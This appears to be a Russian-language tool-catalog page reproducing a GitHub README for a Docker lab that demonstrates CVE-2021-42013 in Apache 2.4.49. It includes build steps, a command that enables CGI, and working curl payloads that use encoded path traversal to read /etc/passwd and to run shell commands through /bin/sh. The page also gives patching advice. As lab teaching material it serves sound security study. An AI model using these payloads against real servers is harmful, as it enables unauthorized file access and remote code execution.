Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
apache-cve-2021-42013-lab — Лабораторная работа, демонстрирующая уязвимость Apache HTTP Server 2.4.49 (CVE-2021-42013) в среде Docker. | Kitploit
Инструменты/GitHubGitHub/berraesen/apache-cve-2021-42013-lab
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubberraesen/apache-cve-2021-42013-lab

apache-cve-2021-42013-lab

Лабораторная работа, демонстрирующая уязвимость Apache HTTP Server 2.4.49 (CVE-2021-42013) в среде Docker.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
71 месяц назадЕщё не проверено

Apache HTTP Server 2.4.49 Path Traversal & Remote Code Execution (CVE-2021-42013)

О проекте

В этом проекте я продемонстрировал уязвимость CVE-2021-42013, обнаруженную в Apache HTTP Server 2.4.49, в лабораторной среде, созданной с помощью Docker.

Цель — в контролируемой среде изучить, как возникает уязвимость, как она работает и какое влияние оказывает на систему.

Эта работа подготовлена исключительно в образовательных и лабораторных целях.

Используемые технологии

  • Docker
  • Ubuntu 22.04
  • Apache HTTP Server 2.4.49
  • Bash
  • curl

Структура файлов проекта

root@kitploit:~
.
├── Dockerfile
├── index.html
└── README.md

Требования

Перед запуском проекта должно быть установлено следующее.

  • Docker Desktop
  • Git (необязательно)

Установка

Сначала скачайте репозиторий на свой компьютер.

root@kitploit:~
git clone https://github.com/berraesen/apache-cve-2021-42013-lab.git

Перейдите в папку.

root@kitploit:~
cd apache-cve-2021-42013-lab

Создайте Docker-образ.

root@kitploit:~
docker build -t apache-2.4.49-src .

Запустите контейнер.

root@kitploit:~
docker run -d -p 8081:80 --name apache-src apache-2.4.49-src

Войдите в контейнер.

root@kitploit:~
docker exec -it apache-src /bin/bash

Проверьте версию Apache.

root@kitploit:~
/usr/local/apache2/bin/httpd -v

Чтобы выйти из контейнера:

root@kitploit:~
exit

Проверка модулей Apache

Проверить, включён ли модуль CGI, можно следующей командой.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl -M

Включение модуля CGI

root@kitploit:~
docker exec -it apache-src sed -i 's/#LoadModule cgid_module/LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Затем перезапустите Apache.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl restart

Чтобы отключить модуль CGI:

root@kitploit:~
docker exec -it apache-src sed -i 's/LoadModule cgid_module/#LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Затем снова выполните перезапуск.

Тестирование уязвимости

Path Traversal

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

Remote Code Execution

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id"

Чтобы вывести дополнительную информацию о системе:

root@kitploit:~
curl.exe -s --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id; uname -a; whoami" -o -

Ожидаемый результат

После завершения установки:

  • Apache 2.4.49 должен успешно работать.
  • При включённом модуле CGI уязвимость можно наблюдать.
  • С помощью Path Traversal можно продемонстрировать доступ к системным файлам.
  • С помощью RCE видно, что на сервере можно выполнять команды.

Принцип работы уязвимости

root@kitploit:~
İstemci (cURL)
      │
      ▼
Apache HTTP Server 2.4.49
      │
      ▼
URL Normalization Hatası
      │
      ▼
Path Traversal
      │
      ├──────────────► CGI Kapalı
      │                     │
      │                     ▼
      │             Dosya erişimi mümkün olabilir
      │
      ▼
CGI Aktif
      │
      ▼
/bin/sh çalıştırılabilir
      │
      ▼
Remote Code Execution (RCE)

Чтобы можно было продемонстрировать сценарий RCE, необходимо включить модуль mod_cgi.

Меры предосторожности

Для устранения этой уязвимости рекомендуется обновить Apache HTTP Server до версии 2.4.51 или более новой. Также рекомендуется отключить CGI, если он не используется, и настроить соответствующие права доступа только для необходимых каталогов.

Скачать инструмент